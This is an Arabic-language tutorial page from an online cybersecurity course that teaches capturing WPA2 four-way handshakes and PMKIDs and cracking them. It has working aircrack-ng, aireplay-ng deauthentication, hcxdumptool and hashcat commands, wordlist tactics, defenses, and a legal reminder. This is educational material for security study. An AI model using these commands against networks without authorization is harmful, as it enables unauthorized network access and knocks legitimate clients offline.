التقاط مصافحة WPA2 وكسرها
التقط مصافحة رباعية المراحل باستخدام aircrack-ng، وحاول تنفيذ هجمات القاموس باستخدام Hashcat.
التقاط مصافحة WPA2 وكسرها درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 2 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
المصافحة الرباعية
عندما يتصل عميل بشبكة WPA2، تستخرج المصافحة الرباعية المفتاح الانتقالي الزوجي (PTK) من PMK (المشتق من PSK) ومن القيم العشوائية. ويتيح التقاط هذه المصافحة تنفيذ كسر لكلمة المرور دون اتصال.
إعداد وضع المراقبة
يتيح وضع المراقبة لبطاقة الشبكة اللاسلكية التقاط جميع الإطارات بغض النظر عن وجهتها، وهو أمر ضروري لالتقاط المصافحة بصورة سلبية. ولا يعمل هذا الوضع إلا مع البطاقات التي تدعمه.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killالتقاط المصافحة بصورة سلبية
يلتقط Airodump-ng الإطارات بصورة سلبية. انتظر حتى يتصل عميل بصورة طبيعية، أو أجبِر إعادة الاتصال عبر إلغاء المصادقة. يظهر التقاط المصافحة في أعلى يمين مخرجات airodump.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...هجوم إلغاء المصادقة
يؤدي إرسال إطارات إلغاء مصادقة منتحلة إلى إجبار العملاء المتصلين على قطع الاتصال وإعادة الاتصال، مما يؤدي إلى التقاط مصافحة جديدة. هذا الهجوم صاخب وسهل الاكتشاف، ويتطلب أن يكون العميل ضمن النطاق.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)هجوم PMKID: لا حاجة إلى عميل
يلتقط هجوم PMKID (hcxdumptool) قيمة PMKID من إطارات beacon/probe من دون الحاجة إلى عميل متصل. ويسهل الحصول عليها، كما يمكن كسرها بفعالية مماثلة للمصافحة الكاملة.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtكسر المصافحة باستخدام Hashcat
حوّل ملف الالتقاط ونفّذ الهجوم باستخدام وضع Hashcat 22000 (التنسيق الموحد لـ WPA2) أو الوضع 2500 (التنسيق القديم). استخدم rockyou.txt مع القواعد للحصول على أفضل النتائج.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dالكسر باستخدام Aircrack-ng
ينفّذ Aircrack-ng كسر WPA2 المعتمد على وحدة المعالجة المركزية مباشرةً من ملف الالتقاط. وهو أبطأ من الكسر باستخدام وحدة معالجة الرسومات في Hashcat، لكنه لا يتطلب تحويل التنسيق.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capاستراتيجية قائمة الكلمات
يعتمد نجاح كسر كلمات مرور WPA2 بالكامل على جودة قائمة الكلمات. استخدم: rockyou.txt كنقطة بداية، ومجموعات قواعد Hashcat لإجراء التحويرات، وقوائم كلمات خاصة بالشركة (الاسم+السنة+الرمز)، وقوائم مستهدفة من OSINT.
الواقع العملي لزمن الكسر
من غير الممكن عمليًا كسر كلمة مرور WPA2 عشوائية تتكون من 20 محرفًا أو أكثر باستخدام القدرة الحاسوبية المتاحة. ولا يكون الكسر عمليًا إلا ضد كلمات المرور القصيرة أو المبنية على قاموس. ولهذا يهم طول كلمة المرور وعشوائيتها أكثر من قواعد التعقيد.
وسائل الحماية
استخدم WPA3-SAE (المحصّن ضد هجمات القواميس دون اتصال)، أو WPA2 مع عبارة مرور عشوائية تتكون من 20 محرفًا أو أكثر، إلى جانب WPA2-Enterprise مع EAP-TLS (الشهادات بدلًا من كلمات المرور).
تذكير قانوني
يُعد التقاط مصافحات WPA2 على شبكات لا تملكها أمرًا غير قانوني. تنطبق جميع التقنيات الواردة هنا على شبكات الاختبار الخاصة بك أو على بيئات المختبر المصرح بها فقط (مثل المختبر المنزلي أو نقطة وصول مخصصة للاختبار).
تحقق سريع
ما التحسين الذي يقدمه هجوم PMKID مقارنةً بالتقاط المصافحة التقليدي؟
ملخص: كسر WPA2
يحوّل التقاط مصافحة WPA2 (أو PMKID) كسر Wi-Fi إلى هجوم قاموس دون اتصال. يعتمد النجاح بالكامل على قوة كلمة المرور: فالكلمات القصيرة والمبنية على قاموس تُكسر بسرعة، بينما يصعب كسر الكلمات الطويلة والعشوائية عمليًا. احمِ الشبكة باستخدام WPA3-SAE وعبارات مرور قوية وWPA2-Enterprise للشبكات المؤسسية.
الأسئلة الشائعة
هل درس «التقاط مصافحة WPA2 وكسرها» مجاني؟
نعم — نص درس «التقاط مصافحة WPA2 وكسرها» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ماذا ستتعلم في «التقاط مصافحة WPA2 وكسرها»؟
التقط مصافحة رباعية المراحل باستخدام aircrack-ng، وحاول تنفيذ هجمات القاموس باستخدام Hashcat. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟
لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 2 من أصل 4.
كم من الوقت يستغرق درس «التقاط مصافحة WPA2 وكسرها»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟
نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- بروتوكولات أمان 802.11: WEP وWPA2 وWPA3
- التقاط مصافحة WPA2 وكسرها
- هجمات Evil Twin والبوابة الأسيرة
- شبكات Wi-Fi للمؤسسات: EAP وRADIUS